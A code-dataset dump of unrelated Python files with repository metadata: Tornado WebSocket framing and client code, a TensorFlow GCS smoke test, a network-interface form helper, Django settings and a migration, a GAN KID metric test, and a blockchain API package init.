def _get_compressor_options(self, side, agreed_parameters):
"""Converts a websocket agreed_parameters set to keyword arguments
for our compressor objects.
"""
options = dict(
persistent=(side + '_no_context_takeover') not in agreed_parameters)
wbits_header = agreed_parameters.get(side + '_max_window_bits', None)
if wbits_header is None:
options['max_wbits'] = zlib.MAX_WBITS
else:
options['max_wbits'] = int(wbits_header)
return options
def _create_compressors(self, side, agreed_parameters):
# TODO: handle invalid parameters gracefully
allowed_keys = set(['server_no_context_takeover',
'client_no_context_takeover',
'server_max_window_bits',
'client_max_window_bits'])
for key in agreed_parameters:
if key not in allowed_keys:
raise ValueError("unsupported compression parameter %r" % key)
other_side = 'client' if (side == 'server') else 'server'
self._compressor = _PerMessageDeflateCompressor(
**self._get_compressor_options(side, agreed_parameters))
self._decompressor = _PerMessageDeflateDecompressor(
**self._get_compressor_options(other_side, agreed_parameters))
def _write_frame(self, fin, opcode, data, flags=0):
if fin:
finbit = self.FIN
else:
finbit = 0
frame = struct.pack("B", finbit | opcode | flags)
l = len(data)
if self.mask_outgoing:
mask_bit = 0x80
else:
mask_bit = 0
if l < 126:
frame += struct.pack("B", l | mask_bit)
elif l <= 0xFFFF:
frame += struct.pack("!BH", 126 | mask_bit, l)
else:
frame += struct.pack("!BQ", 127 | mask_bit, l)
if self.mask_outgoing:
mask = os.urandom(4)
data = mask + _websocket_mask(mask, data)
frame += data
self._wire_bytes_out += len(frame)
try:
return self.stream.write(frame)
except StreamClosedError:
self._abort()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket."""
if binary:
opcode = 0x2
else:
opcode = 0x1
message = tornado.escape.utf8(message)
assert isinstance(message, bytes)
self._message_bytes_out += len(message)
flags = 0
if self._compressor:
message = self._compressor.compress(message)
flags |= self.RSV1
return self._write_frame(True, opcode, message, flags=flags)
def write_ping(self, data):
"""Send ping frame."""
assert isinstance(data, bytes)
self._write_frame(True, 0x9, data)
def _receive_frame(self):
try:
self.stream.read_bytes(2, self._on_frame_start)
except StreamClosedError:
self._abort()
def _on_frame_start(self, data):
self._wire_bytes_in += len(data)
header, payloadlen = struct.unpack("BB", data)
self._final_frame = header & self.FIN
reserved_bits = header & self.RSV_MASK
self._frame_opcode = header & self.OPCODE_MASK
self._frame_opcode_is_control = self._frame_opcode & 0x8
if self._decompressor is not None and self._frame_opcode != 0:
self._frame_compressed = bool(reserved_bits & self.RSV1)
reserved_bits &= ~self.RSV1
if reserved_bits:
# client is using as-yet-undefined extensions; abort
self._abort()
return
self._masked_frame = bool(payloadlen & 0x80)
payloadlen = payloadlen & 0x7f
if self._frame_opcode_is_control and payloadlen >= 126:
# control frames must have payload < 126
self._abort()
return
try:
if payloadlen < 126:
self._frame_length = payloadlen
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length,
self._on_frame_data)
elif payloadlen == 126:
self.stream.read_bytes(2, self._on_frame_length_16)
elif payloadlen == 127:
self.stream.read_bytes(8, self._on_frame_length_64)
except StreamClosedError:
self._abort()
def _on_frame_length_16(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!H", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_frame_length_64(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!Q", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_masking_key(self, data):
self._wire_bytes_in += len(data)
self._frame_mask = data
try:
self.stream.read_bytes(self._frame_length,
self._on_masked_frame_data)
except StreamClosedError:
self._abort()
def _on_masked_frame_data(self, data):
# Don't touch _wire_bytes_in; we'll do it in _on_frame_data.
self._on_frame_data(_websocket_mask(self._frame_mask, data))
def _on_frame_data(self, data):
self._wire_bytes_in += len(data)
if self._frame_opcode_is_control:
# control frames may be interleaved with a series of fragmented
# data frames, so control frames must not interact with
# self._fragmented_*
if not self._final_frame:
# control frames must not be fragmented
self._abort()
return
opcode = self._frame_opcode
elif self._frame_opcode == 0: # continuation frame
if self._fragmented_message_buffer is None:
# nothing to continue
self._abort()
return
self._fragmented_message_buffer += data
if self._final_frame:
opcode = self._fragmented_message_opcode
data = self._fragmented_message_buffer
self._fragmented_message_buffer = None
else: # start of new data message
if self._fragmented_message_buffer is not None:
# can't start new message until the old one is finished
self._abort()
return
if self._final_frame:
opcode = self._frame_opcode
else:
self._fragmented_message_opcode = self._frame_opcode
self._fragmented_message_buffer = data
if self._final_frame:
self._handle_message(opcode, data)
if not self.client_terminated:
self._receive_frame()
def _handle_message(self, opcode, data):
if self.client_terminated:
return
if self._frame_compressed:
data = self._decompressor.decompress(data)
if opcode == 0x1:
# UTF-8 data
self._message_bytes_in += len(data)
try:
decoded = data.decode("utf-8")
except UnicodeDecodeError:
self._abort()
return
self._run_callback(self.handler.on_message, decoded)
elif opcode == 0x2:
# Binary data
self._message_bytes_in += len(data)
self._run_callback(self.handler.on_message, data)
elif opcode == 0x8:
# Close
self.client_terminated = True
if len(data) >= 2:
self.handler.close_code = struct.unpack('>H', data[:2])[0]
if len(data) > 2:
self.handler.close_reason = to_unicode(data[2:])
# Echo the received close code, if any (RFC 6455 section 5.5.1).
self.close(self.handler.close_code)
elif opcode == 0x9:
# Ping
self._write_frame(True, 0xA, data)
elif opcode == 0xA:
# Pong
self._run_callback(self.handler.on_pong, data)
else:
self._abort()
def close(self, code=None, reason=None):
"""Closes the WebSocket connection."""
if not self.server_terminated:
if not self.stream.closed():
if code is None and reason is not None:
code = 1000 # "normal closure" status code
if code is None:
close_data = b''
else:
close_data = struct.pack('>H', code)
if reason is not None:
close_data += utf8(reason)
self._write_frame(True, 0x8, close_data)
self.server_terminated = True
if self.client_terminated:
if self._waiting is not None:
self.stream.io_loop.remove_timeout(self._waiting)
self._waiting = None
self.stream.close()
elif self._waiting is None:
# Give the client a few seconds to complete a clean shutdown,
# otherwise just close the connection.
self._waiting = self.stream.io_loop.add_timeout(
self.stream.io_loop.time() + 5, self._abort)
class WebSocketClientConnection(simple_httpclient._HTTPConnection):
"""WebSocket client connection.
This class should not be instantiated directly; use the
`websocket_connect` function instead.
"""
def __init__(self, io_loop, request, on_message_callback=None,
compression_options=None):
self.compression_options = compression_options
self.connect_future = TracebackFuture()
self.protocol = None
self.read_future = None
self.read_queue = collections.deque()
self.key = base64.b64encode(os.urandom(16))
self._on_message_callback = on_message_callback
self.close_code = self.close_reason = None
scheme, sep, rest = request.url.partition(':')
scheme = {'ws': 'http', 'wss': 'https'}[scheme]
request.url = scheme + sep + rest
request.headers.update({
'Upgrade': 'websocket',
'Connection': 'Upgrade',
'Sec-WebSocket-Key': self.key,
'Sec-WebSocket-Version': '13',
})
if self.compression_options is not None:
# Always offer to let the server set our max_wbits (and even though
# we don't offer it, we will accept a client_no_context_takeover
# from the server).
# TODO: set server parameters for deflate extension
# if requested in self.compression_options.
request.headers['Sec-WebSocket-Extensions'] = (
'permessage-deflate; client_max_window_bits')
self.tcp_client = TCPClient(io_loop=io_loop)
super(WebSocketClientConnection, self).__init__(
io_loop, None, request, lambda: None, self._on_http_response,
104857600, self.tcp_client, 65536, 104857600)
def close(self, code=None, reason=None):
"""Closes the websocket connection.
``code`` and ``reason`` are documented under
`WebSocketHandler.close`.
.. versionadded:: 3.2
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.protocol is not None:
self.protocol.close(code, reason)
self.protocol = None
def on_connection_close(self):
if not self.connect_future.done():
self.connect_future.set_exception(StreamClosedError())
self.on_message(None)
self.tcp_client.close()
super(WebSocketClientConnection, self).on_connection_close()
def _on_http_response(self, response):
if not self.connect_future.done():
if response.error:
self.connect_future.set_exception(response.error)
else:
self.connect_future.set_exception(WebSocketError(
"Non-websocket response"))
def headers_received(self, start_line, headers):
if start_line.code != 101:
return super(WebSocketClientConnection, self).headers_received(
start_line, headers)
self.headers = headers
self.protocol = self.get_websocket_protocol()
self.protocol._process_server_headers(self.key, self.headers)
self.protocol._receive_frame()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
self.stream = self.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
# Once we've taken over the connection, clear the final callback
# we set on the http request. This deactivates the error handling
# in simple_httpclient that would otherwise interfere with our
# ability to see exceptions.
self.final_callback = None
self.connect_future.set_result(self)
def write_message(self, message, binary=False):
"""Sends a message to the WebSocket server."""
return self.protocol.write_message(message, binary)
def read_message(self, callback=None):
"""Reads a message from the WebSocket server.
If on_message_callback was specified at WebSocket
        initialization, this function will never return messages.
Returns a future whose result is the message, or None
if the connection is closed. If a callback argument
is given it will be called with the future when it is
ready.
"""
assert self.read_future is None
future = TracebackFuture()
if self.read_queue:
future.set_result(self.read_queue.popleft())
else:
self.read_future = future
if callback is not None:
self.io_loop.add_future(future, callback)
return future
def on_message(self, message):
if self._on_message_callback:
self._on_message_callback(message)
elif self.read_future is not None:
self.read_future.set_result(message)
self.read_future = None
else:
self.read_queue.append(message)
def on_pong(self, data):
pass
def get_websocket_protocol(self):
return WebSocketProtocol13(self, mask_outgoing=True,
compression_options=self.compression_options)
def websocket_connect(url, io_loop=None, callback=None, connect_timeout=None,
on_message_callback=None, compression_options=None):
"""Client-side websocket support.
Takes a url and returns a Future whose result is a
`WebSocketClientConnection`.
``compression_options`` is interpreted in the same way as the
return value of `.WebSocketHandler.get_compression_options`.
The connection supports two styles of operation. In the coroutine
style, the application typically calls
`~.WebSocketClientConnection.read_message` in a loop::
conn = yield websocket_connect(url)
while True:
msg = yield conn.read_message()
if msg is None: break
# Do something with msg
In the callback style, pass an ``on_message_callback`` to
``websocket_connect``. In both styles, a message of ``None``
indicates that the connection has been closed.
.. versionchanged:: 3.2
Also accepts ``HTTPRequest`` objects in place of urls.
.. versionchanged:: 4.1
Added ``compression_options`` and ``on_message_callback``.
The ``io_loop`` argument is deprecated.
"""
if io_loop is None:
io_loop = IOLoop.current()
if isinstance(url, httpclient.HTTPRequest):
assert connect_timeout is None
request = url
# Copy and convert the headers dict/object (see comments in
# AsyncHTTPClient.fetch)
request.headers = httputil.HTTPHeaders(request.headers)
else:
request = httpclient.HTTPRequest(url, connect_timeout=connect_timeout)
request = httpclient._RequestProxy(
request, httpclient.HTTPRequest._DEFAULTS)
conn = WebSocketClientConnection(io_loop, request,
on_message_callback=on_message_callback,
compression_options=compression_options)
if callback is not None:
io_loop.add_future(conn.connect_future, callback)
return conn.connect_future
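# Illustrative wiring for the EchoWebSocket example from the WebSocketHandler
# docstring above; the route and port here are arbitrary choices.
if __name__ == "__main__":
    class EchoWebSocket(WebSocketHandler):
        def open(self):
            print("WebSocket opened")

        def on_message(self, message):
            # Echo every received message back to the client.
            self.write_message(u"You said: " + message)

        def on_close(self):
            print("WebSocket closed")

    application = tornado.web.Application([(r"/websocket", EchoWebSocket)])
    application.listen(8888)
    IOLoop.current().start()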
avg_line_length: 38.356538 | max_line_length: 80 | alphanum_fraction: 0.625929
hexsha: 129b21745d4afa68f105bfb64a50ad73a74bd5c3 | size: 5,556 | ext: py | lang: Python
max_stars: tensorflow/tools/gcs_test/python/gcs_smoke.py | ankush-me/tensorflow @ ec7f37e40fedb23435bfb7e28668e5fa63ff52f3 | ["Apache-2.0"] | count: 2 | events: 2017-10-14T09:13:27.000Z to 2017-10-26T18:34:28.000Z
max_issues / max_forks: tensorflow/tools/gcs_test/python/gcs_smoke.py | kiliczsh/tensorflow @ f49aca4532c155597c669cf2189f211cafbebf96 | ["Apache-2.0"] | count: null | event datetimes: null
content:
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Smoke test for reading records from GCS to TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import sys
import time
import numpy as np
import tensorflow as tf
from tensorflow.core.example import example_pb2
from tensorflow.python.lib.io import file_io
flags = tf.app.flags
flags.DEFINE_string("gcs_bucket_url", "",
"The URL to the GCS bucket in which the temporary "
"tfrecord file is to be written and read, e.g., "
"gs://my-gcs-bucket/test-directory")
flags.DEFINE_integer("num_examples", 10, "Number of examples to generate")
FLAGS = flags.FLAGS
def create_examples(num_examples, input_mean):
"""Create ExampleProto's containg data."""
ids = np.arange(num_examples).reshape([num_examples, 1])
inputs = np.random.randn(num_examples, 1) + input_mean
target = inputs - input_mean
examples = []
for row in range(num_examples):
ex = example_pb2.Example()
ex.features.feature["id"].bytes_list.value.append(str(ids[row, 0]))
ex.features.feature["target"].float_list.value.append(target[row, 0])
ex.features.feature["inputs"].float_list.value.append(inputs[row, 0])
examples.append(ex)
return examples
def create_dir_test():
"""Verifies file_io directory handling methods ."""
starttime = int(round(time.time() * 1000))
dir_name = "%s/tf_gcs_test_%s" % (FLAGS.gcs_bucket_url, starttime)
print("Creating dir %s" % dir_name)
file_io.create_dir(dir_name)
elapsed = int(round(time.time() * 1000)) - starttime
print("Created directory in: %d milliseconds" % elapsed)
# Check that the directory exists.
dir_exists = file_io.is_directory(dir_name)
print("%s directory exists: %s" % (dir_name, dir_exists))
# List contents of just created directory.
print("Listing directory %s." % dir_name)
starttime = int(round(time.time() * 1000))
print(file_io.list_directory(dir_name))
elapsed = int(round(time.time() * 1000)) - starttime
print("Listed directory %s in %s milliseconds" % (dir_name, elapsed))
# Delete directory.
print("Deleting directory %s." % dir_name)
starttime = int(round(time.time() * 1000))
file_io.delete_recursively(dir_name)
elapsed = int(round(time.time() * 1000)) - starttime
print("Deleted directory %s in %s milliseconds" % (dir_name, elapsed))
if __name__ == "__main__":
# Sanity check on the GCS bucket URL.
if not FLAGS.gcs_bucket_url or not FLAGS.gcs_bucket_url.startswith("gs://"):
print("ERROR: Invalid GCS bucket URL: \"%s\"" % FLAGS.gcs_bucket_url)
sys.exit(1)
# Generate random tfrecord path name.
input_path = FLAGS.gcs_bucket_url + "/"
input_path += "".join(random.choice("0123456789ABCDEF") for i in range(8))
input_path += ".tfrecord"
print("Using input path: %s" % input_path)
# Verify that writing to the records file in GCS works.
print("\n=== Testing writing and reading of GCS record file... ===")
example_data = create_examples(FLAGS.num_examples, 5)
with tf.python_io.TFRecordWriter(input_path) as hf:
for e in example_data:
hf.write(e.SerializeToString())
print("Data written to: %s" % input_path)
# Verify that reading from the tfrecord file works and that
# tf_record_iterator works.
record_iter = tf.python_io.tf_record_iterator(input_path)
read_count = 0
for r in record_iter:
read_count += 1
print("Read %d records using tf_record_iterator" % read_count)
if read_count != FLAGS.num_examples:
print("FAIL: The number of records read from tf_record_iterator (%d) "
"differs from the expected number (%d)" % (read_count,
FLAGS.num_examples))
sys.exit(1)
# Verify that running the read op in a session works.
print("\n=== Testing TFRecordReader.read op in a session... ===")
with tf.Graph().as_default() as g:
filename_queue = tf.train.string_input_producer([input_path], num_epochs=1)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
sess.run(tf.initialize_local_variables())
tf.train.start_queue_runners()
index = 0
for _ in range(FLAGS.num_examples):
print("Read record: %d" % index)
sess.run(serialized_example)
index += 1
# Reading one more record should trigger an exception.
try:
sess.run(serialized_example)
print("FAIL: Failed to catch the expected OutOfRangeError while "
"reading one more record than is available")
sys.exit(1)
except tf.errors.OutOfRangeError:
print("Successfully caught the expected OutOfRangeError while "
"reading one more record than is available")
create_dir_test()
avg_line_length: 39.126761 | max_line_length: 80 | alphanum_fraction: 0.690605
hexsha: 8dcce585e174a76e4756d85c2fad74ed83ca4909 | size: 5,752 | ext: py | lang: Python
max_stars: CadVlan/EquipInterface/business.py | marcusgc/GloboNetworkAPI-WebUI @ 1172f14028f9c116d71df7489eda770446b131d2 | ["Apache-2.0"] | count: 17 | events: 2015-05-19T20:03:45.000Z to 2022-03-24T06:19:47.000Z
max_issues: CadVlan/EquipInterface/business.py | marcusgc/GloboNetworkAPI-WebUI @ 1172f14028f9c116d71df7489eda770446b131d2 | ["Apache-2.0"] | count: 41 | events: 2015-01-27T18:36:07.000Z to 2021-06-10T20:34:03.000Z
max_forks: CadVlan/EquipInterface/business.py | marcusgc/GloboNetworkAPI-WebUI @ 1172f14028f9c116d71df7489eda770446b131d2 | ["Apache-2.0"] | count: 19 | events: 2016-09-12T07:35:42.000Z to 2022-01-28T23:46:11.000Z
content:
# -*- coding:utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from operator import itemgetter
from CadVlan.settings import PATCH_PANEL_ID
from CadVlan.Util.utility import get_id_in_list
def find_first_interface(interfs):
"""
Get first interface to show in edit form
"""
possible_firsts = []
for interf in interfs:
if interf['tipo_equip'] == str(PATCH_PANEL_ID):
back = interf['ligacao_back']
front = interf['ligacao_front']
if back == None or front == None:
possible_firsts.append(interf)
else:
possible_firsts.append(interf)
# If none is possible
if len(possible_firsts) == 0:
for interf in interfs:
possible_firsts.append(interf)
# Order by id
sorted_list = sorted(possible_firsts, key=itemgetter('id'))
# Get first
return sorted_list[0]
def get_initial(interf):
if interf['marca'] == "3":
combo = interf['interface'][0:2] if not interf['interface'].startswith("Serial") else "Serial"
else:
combo = ""
prot = 0
if interf['protegida'] == u'True':
prot = 1
return {'combo': combo, 'name': interf['interface'], 'description': interf['descricao'],
'protected': prot, 'equip_name': interf['equipamento_nome'],
'equip_id': interf['equipamento'], 'inter_id': interf['id'], 'int_type': interf['tipo'],
'channel': interf['sw_router'], 'back': interf['ligacao_back'], 'front': interf['ligacao_front']}
def next_interface(interface, interfs, last_id, first_time):
front = interface['ligacao_front']
back = interface['ligacao_back']
if not front == None and last_id != front:
inter_front = get_id_in_list(interfs, front)
return inter_front, interface['id'], False
elif last_id != back:
inter_back = get_id_in_list(interfs, back)
return inter_back, interface['id'], False
elif len(interfs) == 2:
if first_time:
inter_equal = interfs[1]
first_time = False
return inter_equal, inter_equal['id'], False
else:
return None, interfs[1]['id'], False
else:
return None, interface['id'], False
def make_initials_and_params(interfs, int_type_list=None):
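    """
    Build the data consumed by the interface edit template.
    Walks the chain of connected interfaces starting from the first one and,
    for each interface, collects the form initial values, the combo parameters
    (equipment brand plus the interface type list), the equipment type, the
    number of connection lines to draw above and below, and whether a patch
    panel link is on the front or the back.
    Returns: initials, params, equip_types, up_list, down_list, front_or_back;
    all returned lists except initials are reversed so the template can
    consume them with pop().
    """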
initials = []
params = []
equip_types = []
up_list = []
down_list = []
front_or_back = []
parametros = []
# First interface to show in edit form
interface = find_first_interface(interfs)
# Connect lines
front = interface['ligacao_front']
back = interface['ligacao_back']
e_type = interface['tipo_equip']
if e_type == str(PATCH_PANEL_ID):
up, down = 2, 2
if front == None and not back == None:
down = 1
front_or_back.append("front")
elif back == None and not front == None:
down = 1
front_or_back.append("back")
if len(front_or_back) == 0:
front_or_back.append("front")
else:
up, down = 0, 2
if not front == None:
down = 1
# Add
brand = interface['marca'] if interface['tipo_equip'] != "2" else "0"
parametros.append(brand)
parametros.append(int_type_list)
params.append(parametros)
up_list.append(up)
down_list.append(down)
initials.append(get_initial(interface))
equip_types.append(interface['tipo_equip'])
last_id = interface['id']
first_time = True
while True:
# Get the next interface to show in edit form
interface, last_id, first_time = next_interface(interface, interfs, last_id, first_time)
if interface != None:
# Connect lines
front = interface['ligacao_front']
back = interface['ligacao_back']
e_type = interface['tipo_equip']
if e_type == str(PATCH_PANEL_ID):
up, down = 1, 1
if not front == last_id or not back == last_id:
if front == None or back == None:
down = 2
if front == last_id:
front_or_back.append("front")
elif back == last_id:
front_or_back.append("back")
else:
up, down = 1, 0
# Add
parametros = []
brand = interface['marca'] if interface['tipo_equip'] != "2" else "0"
parametros.append(brand)
parametros.append(int_type_list)
params.append(parametros)
up_list.append(up)
down_list.append(down)
initials.append(get_initial(interface))
equip_types.append(interface['tipo_equip'])
else:
break
# Reverse lists order to call pop method in template
params.reverse()
up_list.reverse()
down_list.reverse()
equip_types.reverse()
front_or_back.reverse()
return initials, params, equip_types, up_list, down_list, front_or_back
avg_line_length: 33.248555 | max_line_length: 109 | alphanum_fraction: 0.613873
hexsha: eb548eaf5a8e2428318c19ddd628f859254079cc | size: 222 | ext: py | lang: Python
max_stars: project/settings/base/i18n.py | limitedeternity/django-skeleton @ 03001c81e36ae853831e57dea238ff7bddda4dbf | ["MIT"] | count: 2 | events: 2018-07-10T19:18:32.000Z to 2018-07-22T12:38:21.000Z
max_issues / max_forks: project/settings/base/i18n.py | limitedeternity/django-skeleton @ 03001c81e36ae853831e57dea238ff7bddda4dbf | ["MIT"] | count: null | event datetimes: null
content:
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
from os.path import join
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
LOCALE_PATHS = (join(PROJECT_DIR, 'conf/locale'),)
| 20.181818
| 54
| 0.711712
|
8ba7ef9bfef32b1d57db1c4383c81ae19b88b394
| 6,885
|
py
|
Python
|
tests/metrics/test_compute_kid.py
|
houliangict/mimicry
|
d9e43940254de4a85c78e644f2d2b1135de4b50d
|
[
"MIT"
] | 560
|
2020-03-31T07:07:26.000Z
|
2022-03-15T08:29:37.000Z
|
tests/metrics/test_compute_kid.py
|
houliangict/mimicry
|
d9e43940254de4a85c78e644f2d2b1135de4b50d
|
[
"MIT"
] | 34
|
2020-03-31T02:42:16.000Z
|
2021-12-10T15:47:30.000Z
|
tests/metrics/test_compute_kid.py
|
houliangict/mimicry
|
d9e43940254de4a85c78e644f2d2b1135de4b50d
|
[
"MIT"
] | 63
|
2020-04-04T09:56:22.000Z
|
2022-03-15T02:34:58.000Z
|
import os
import shutil
import pytest
import numpy as np
import tensorflow as tf
import torch
from torch_mimicry.metrics import compute_kid
from torch_mimicry.metrics.inception_model import inception_utils
from torch_mimicry.nets.gan import gan
class ExampleGen(gan.BaseGenerator):
def __init__(self,
bottom_width=4,
nz=4,
ngf=256,
loss_type='gan',
*args,
**kwargs):
super().__init__(nz=nz,
ngf=ngf,
bottom_width=bottom_width,
loss_type=loss_type,
*args,
**kwargs)
def forward(self, x):
output = torch.ones(x.shape[0], 3, 32, 32)
return output
class CustomDataset(torch.utils.data.Dataset):
def __init__(self, nchw=True):
super().__init__()
if nchw:
self.data = torch.ones(30, 3, 32, 32)
else:
self.data = torch.ones(30, 32, 32, 3)
def __len__(self):
return self.data.shape[0]
def __getitem__(self, idx):
return self.data[idx]
class TestComputeKID:
def setup(self):
self.netG = ExampleGen()
self.num_samples = 50
self.device = torch.device("cpu")
# Create inception graph once.
self.inception_path = './metrics/inception_model'
if not os.path.exists(self.inception_path):
os.makedirs(self.inception_path)
inception_utils.create_inception_graph(self.inception_path)
# Directory
self.log_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_log")
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
def _create_cached_file(self):
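        # 2048 matches the Inception pooling-feature dimension used by the KID
        # metric, so this fake cache mimics the layout of a real feature file.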
feat = np.ones((self.num_samples, 2048))
cached_file = os.path.join(self.log_dir, 'cached_kid.npz')
np.savez(cached_file, feat=feat)
def test_compute_gen_dist_feat(self):
if self.device.index is not None:
# Avoid unbounded memory usage
gpu_options = tf.compat.v1.GPUOptions(
allow_growth=True,
per_process_gpu_memory_fraction=0.15,
visible_device_list=str(self.device.index))
config = tf.compat.v1.ConfigProto(gpu_options=gpu_options)
else:
config = tf.compat.v1.ConfigProto(device_count={'GPU': 0})
with tf.compat.v1.Session(config=config) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
fake_feat = compute_kid.compute_gen_dist_feat(
netG=self.netG,
num_samples=self.num_samples,
sess=sess,
seed=0,
device=self.device,
batch_size=10,
print_every=1)
assert fake_feat.shape == (self.num_samples, 2048)
def test_compute_real_dist_feat(self):
if self.device.index is not None:
# Avoid unbounded memory usage
gpu_options = tf.GPUOptions(allow_growth=True,
per_process_gpu_memory_fraction=0.15,
visible_device_list=str(
self.device.index))
config = tf.compat.v1.ConfigProto(gpu_options=gpu_options)
else:
config = tf.compat.v1.ConfigProto(device_count={'GPU': 0})
with tf.compat.v1.Session(config=config) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
real_feat = compute_kid.compute_real_dist_feat(
num_samples=self.num_samples,
sess=sess,
dataset='fake_data',
batch_size=10,
log_dir=self.log_dir)
assert real_feat.shape == (self.num_samples, 2048)
def test_kid_score(self):
custom_dataset = CustomDataset()
# Non default dataset
with pytest.raises(ValueError):
compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=None,
seed=0,
batch_size=10,
dataset='does_not_exist',
log_dir=self.log_dir)
# Custom dataset without feat file
with pytest.raises(ValueError):
compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=None,
seed=0,
batch_size=10,
dataset=custom_dataset,
log_dir=self.log_dir)
# Invalid dataset
with pytest.raises(ValueError):
compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=None,
seed=0,
batch_size=10,
dataset=None,
log_dir=self.log_dir)
# Test outputs
score, var = compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=self.device,
dataset='fake_data',
batch_size=10,
log_dir=self.log_dir,
seed=0)
assert type(score) == float
assert type(var) == float
# Run from cached
        cached_file = os.path.join(self.log_dir, 'cached_kid.npz')
self._create_cached_file()
score, var = compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=self.device,
dataset='fake_data',
batch_size=10,
log_dir=self.log_dir,
feat_file=cached_file,
seed=0)
assert type(score) == float
assert type(var) == float
def teardown(self):
if os.path.exists(self.log_dir):
shutil.rmtree(self.log_dir)
del self.netG
if __name__ == "__main__":
test = TestComputeKID()
test.setup()
test.test_compute_gen_dist_feat()
test.test_compute_real_dist_feat()
test.test_kid_score()
test.teardown()
| 34.949239
| 79
| 0.501235
|
3a997e6ec7941536f1cf10faae587fed4a6aedf9
| 489
|
py
|
Python
|
apps/imgur/migrations/0004_post_created.py
|
vanyakosmos/memes-reposter
|
7bcd1117a81777f0662bcca38690de0c0404dbfa
|
[
"MIT"
] | 26
|
2019-01-19T21:07:57.000Z
|
2022-03-07T16:07:52.000Z
|
apps/imgur/migrations/0004_post_created.py
|
vaniakosmos/telemgur
|
7bcd1117a81777f0662bcca38690de0c0404dbfa
|
[
"MIT"
] | 7
|
2020-02-11T22:59:44.000Z
|
2021-06-21T07:44:56.000Z
|
apps/imgur/migrations/0004_post_created.py
|
vaniakosmos/telemgur
|
7bcd1117a81777f0662bcca38690de0c0404dbfa
|
[
"MIT"
] | 9
|
2018-09-21T06:38:08.000Z
|
2022-01-26T11:57:28.000Z
|
# Generated by Django 2.0.3 on 2018-07-01 10:07
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('imgur', '0003_auto_20180630_1810'),
]
operations = [
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
]
| 23.285714
| 93
| 0.631902
|
284e287a3688f8daccb2ecba33a564e28d5f71eb
| 1,020
|
py
|
Python
|
blockapi/api/__init__.py
|
galvanizze/blockapi
|
d46fc17861d6e914b823bbbf77e312dcaac1b6af
|
[
"MIT"
] | null | null | null |
blockapi/api/__init__.py
|
galvanizze/blockapi
|
d46fc17861d6e914b823bbbf77e312dcaac1b6af
|
[
"MIT"
] | null | null | null |
blockapi/api/__init__.py
|
galvanizze/blockapi
|
d46fc17861d6e914b823bbbf77e312dcaac1b6af
|
[
"MIT"
] | null | null | null |
from blockapi.api.alethio import *
from blockapi.api.binance import *
from blockapi.api.blockchaininfo import *
from blockapi.api.blockchainos import *
from blockapi.api.blockchair import *
from blockapi.api.blockcypher import *
from blockapi.api.blockonomics import *
from blockapi.api.blockscout import *
from blockapi.api.btc import *
from blockapi.api.cardanoexplorer import *
from blockapi.api.chainso import *
from blockapi.api.cosmos import *
from blockapi.api.cryptoid import *
from blockapi.api.dcrdata import *
from blockapi.api.digonchain import *
from blockapi.api.eospark import *
from blockapi.api.etherscan import *
from blockapi.api.ethplorer import *
from blockapi.api.greymass import *
from blockapi.api.insight import *
from blockapi.api.neoscan import *
from blockapi.api.ontology import *
from blockapi.api.stellar import *
from blockapi.api.trezor import *
from blockapi.api.tronscan import *
from blockapi.api.tzscan import *
from blockapi.api.zchain import *
from blockapi.api.zensystem import *
| 35.172414
| 42
| 0.807843
|
31e6ca5fd267d56e197395ccebec90a010e945aa
| 169
|
py
|
Python
|
chapter03/my_test4.py
|
stavinski/grayhat_python_redux
|
882b66616426a5dc774331ad1894049d19702424
|
[
"MIT"
] | 4
|
2019-07-03T08:41:03.000Z
|
2022-02-22T03:36:01.000Z
|
chapter03/my_test4.py
|
stavinski/grayhat_python_redux
|
882b66616426a5dc774331ad1894049d19702424
|
[
"MIT"
] | null | null | null |
chapter03/my_test4.py
|
